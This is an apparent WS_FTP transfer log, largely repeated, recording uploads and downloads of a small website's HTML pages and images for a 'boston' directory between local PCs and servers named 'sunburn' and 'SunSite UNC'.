10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
